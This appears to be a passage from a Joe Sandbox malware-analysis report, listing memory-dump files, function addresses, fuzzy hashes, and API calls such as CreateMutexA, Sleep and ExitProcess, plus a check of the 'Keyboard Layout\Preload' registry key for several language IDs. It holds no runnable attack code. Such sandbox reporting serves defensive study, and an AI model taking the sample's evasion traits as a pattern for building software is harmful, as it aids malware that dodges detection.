Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$VUUU$invalid stoi argument$stoi argument out of range
API String ID: 3677997916-1112634906
Opcode ID: 79d5354a15c1f88068464c9cad3ec0f571e9e18726c34a490623c98922d2b1d4
Instruction ID: d52b6676bce46679c5113c9cb37c73791e02dc19a545ec17a5ea4b975d114aec
Opcode Fuzzy Hash: 79d5354a15c1f88068464c9cad3ec0f571e9e18726c34a490623c98922d2b1d4
Instruction Fuzzy Hash: 4CC21371A002189BEF28DF28CC85BEDB775EF45304F5082A9E409E72C2DB759A84DF95

Function 00F6735A Relevance: 2.5, APIs: 1, Instructions: 1031
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: ConditionVariableWake
String ID:
API String ID: 1192502693-0
Opcode ID: 0b54ef4650fc748269eac96a3885c063ac35bb614e337101ef5718701d6646cd
Instruction ID: 701e28ac68d8abacb2bd6b2444276529ffec7383631d107e44b8228f0bc0a72f
Opcode Fuzzy Hash: 0b54ef4650fc748269eac96a3885c063ac35bb614e337101ef5718701d6646cd
Instruction Fuzzy Hash: 53729D71A042489BEB18EF78CD86B9DBB76EF41314F50825DF405973C1DB399A80EB92

Function 00F9652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00F9652A,?,?,?,?,?,00F97661), ref: 00F96567

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 7a9433bf61be599c44d4427d92e8d9c103c32ce82b0d394c308077baf489dfc0
Instruction ID: 9103eb2ae7587575668c851379141e0ab765be76ebe08f5c8f6f28f161258fa9
Opcode Fuzzy Hash: 7a9433bf61be599c44d4427d92e8d9c103c32ce82b0d394c308077baf489dfc0
Instruction Fuzzy Hash: 90E0C230440108AFEF357F28CC09D483B69EF52759F190810FE1886232CF3AEE82EA80

Function 05030732 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855793075.0000000005030000.00000040.00001000.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5030000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 073369c750a437a409a3d33b6e77eeee791a2882f81d21c63152c2d69262f319
Instruction ID: 0593b343dbe26b25468f36d1067ece0bb1e625453ea07cacb3226ed978159e5f
Opcode Fuzzy Hash: 073369c750a437a409a3d33b6e77eeee791a2882f81d21c63152c2d69262f319
Instruction Fuzzy Hash: 311104EF48D210BDE342C6417B2EAFD6A2FB0D37303318036B49786102E2C0465D55B1

Function 00F65C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

00000422, xrefs: 00F660C9
0000043f, xrefs: 00F6612B
00000419, xrefs: 00F66098
00000423, xrefs: 00F660FA
Keyboard Layout\Preload, xrefs: 00F66054

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 4d327cce14b00c932f27edc7e91b096094603c77fd59ca6ce3218970f779b6a8
Instruction ID: 454500aa32cc438b54797b1711ce06ebc6cd1c51a5f5537512841c83fcec63d1
Opcode Fuzzy Hash: 4d327cce14b00c932f27edc7e91b096094603c77fd59ca6ce3218970f779b6a8
Instruction Fuzzy Hash: 3FF1E170A0025CABEF24DF54CC85BDEBBB9EF44704F5082A9F509A7281DB749A84DF91

Function 00F69BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F6A963
CreateMutexA.KERNEL32(00000000,00000000,00FC3254), ref: 00F6A981

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850382530.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850401380.0000000001244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850453459.0000000001270000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850471219.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850532750.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850551918.0000000001279000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850571435.0000000001287000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850590292.0000000001289000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: a2c65bce14ca66c598d02cbe868ac2be809908b1cc03394ef1ed4254fcbe4d70
Instruction ID: 153726f84fdc18fab3e98c26bdd0ebbd2744050bd7fc927a713786173f98b744
Opcode Fuzzy Hash: a2c65bce14ca66c598d02cbe868ac2be809908b1cc03394ef1ed4254fcbe4d70
Instruction Fuzzy Hash: 32314C31B04105DBEB08DB78DD85B5DB776EFC1320F308219E014E72D6C7755981AB52

Function 00F69F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00F6A963
CreateMutexA.KERNEL32(00000000,00000000,00FC3254), ref: 00F6A981

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
